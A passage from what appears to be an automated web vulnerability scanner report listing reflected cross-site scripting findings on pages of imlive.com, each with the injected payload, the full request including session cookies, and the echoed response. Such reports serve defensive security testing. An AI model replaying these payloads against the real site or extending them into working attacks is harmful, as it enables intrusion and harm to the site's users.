__utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:10 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:10 GMT Connection: close Content-Length: 19420 Vary: Accept-Encoding
<html> <head> <title>live webcam video chat with experts at imlive</title> <meta name="description" content="Live video chat sessions with experts in just about anything - Mysticism & Spir ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/liveexperts.asp?42604'><a>750b6f3eb7b=1&lr=1107816009&ud=0&pe=liveexperts.asp&qs=42604'> ...[SNIP]...
2.124. http://imlive.com/localcompanionship.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/localcompanionship.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d9f12'><a>f87a2832891 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /localcompanionship.asp?d9f12'><a>f87a2832891=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:12 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:12 GMT Connection: close Content-Length: 16579 Vary: Accept-Encoding
<html> <head> <title>Friends & Romance on Webcam Video Chat at ImLive</title> <meta name="description" content="Like shopping? Go out to restaurants? Find your soul mate on live webcam vid ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/localcompanionship.asp?d9f12'><a>f87a2832891=1&lr=1107816009&ud=0&pe=localcompanionship.asp&qs=d9f12'> ...[SNIP]...
2.125. http://imlive.com/minglesingles.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/minglesingles.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1a452'><a>a6955adbf25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /minglesingles.asp?1a452'><a>a6955adbf25=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:10 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:10 GMT Connection: close Content-Length: 16143 Vary: Accept-Encoding
<html> <head> <title>Mingle With Friends on Live Webcam Video Chat at ImLive</title> <meta name="description" content="Mingle with Singles on live webcam video chat - Find a match and go on ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/minglesingles.asp?1a452'><a>a6955adbf25=1&lr=1107816009&ud=0&pe=minglesingles.asp&qs=1a452'> ...[SNIP]...
2.126. http://imlive.com/pr.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/pr.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 90148'><a>2e9c3e6d159 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /pr.asp?90148'><a>2e9c3e6d159=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:18 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:18 GMT Connection: close Content-Length: 9886 Vary: Accept-Encoding
2.127. http://imlive.com/preparesearch.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/preparesearch.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad584"><a>5bd7ab7e3b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /preparesearch.asp?ad584"><a>5bd7ab7e3b0=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/preparesearch.aspx?ad584"><a>5bd7ab7e3b0=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.128. http://imlive.com/preparesearch.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/preparesearch.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cf17'-alert(1)-'f7758fd0154 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /preparesearch.asp?1cf17'-alert(1)-'f7758fd0154=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/preparesearch.aspx&he=imlive.com&ul=/preparesearch.aspx?1cf17'-alert(1)-'f7758fd0154=1&qs=1cf17'-alert(1)-'f7758fd0154=1&qs=1cf17'-alert(1)-'f7758fd0154=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function ...[SNIP]...
2.129. http://imlive.com/preparesearch.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/preparesearch.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aed33"><a>4a10453e31b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /preparesearch.aspx?aed33"><a>4a10453e31b=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:56 GMT Connection: close Content-Length: 19417 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/preparesearch.aspx?aed33"><a>4a10453e31b=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.130. http://imlive.com/preparesearch.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/preparesearch.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ac9b'-alert(1)-'0d66f31204c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /preparesearch.aspx?8ac9b'-alert(1)-'0d66f31204c=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:25:00 GMT Connection: close Content-Length: 19578 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/preparesearch.aspx&he=imlive.com&ul=/preparesearch.aspx?8ac9b'-alert(1)-'0d66f31204c=1&qs=8ac9b'-alert(1)-'0d66f31204c=1&qs=8ac9b'-alert(1)-'0d66f31204c=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function ...[SNIP]...
2.131. http://imlive.com/sitemap.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/sitemap.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1979b'><a>18155b4088b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sitemap.html?1979b'><a>18155b4088b=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:24:32 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:32 GMT Connection: close Content-Length: 33756 Vary: Accept-Encoding
<html> <head> <meta name="keywords" content="live Video Chat, Video Chat live, Video Chat live, live Video Chat, webcam chat, live web cam, webcam live, live webcam, web cam live, web cam communti ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/sitemap.html?1979b'><a>18155b4088b=1&lr=1107816008&ud=0&pe=sitemap.asp&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
2.132. http://imlive.com/videosfr.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/videosfr.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f44ce'><a>23f9fd95641 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videosfr.asp?f44ce'><a>23f9fd95641=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:12 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:13 GMT Connection: close Content-Length: 15757 Vary: Accept-Encoding
<html> <head> <title>Video Chat Recorded on Webcam at ImLive</title> <meta name="description" content="Come in and discover what our hosts have recorded in Friends & Romance live webcam vide ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/videosfr.asp?f44ce'><a>23f9fd95641=1&lr=1107816009&ud=0&pe=videosfr.asp&qs=f44ce'> ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2a49'-alert(1)-'2edefc94fdc was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
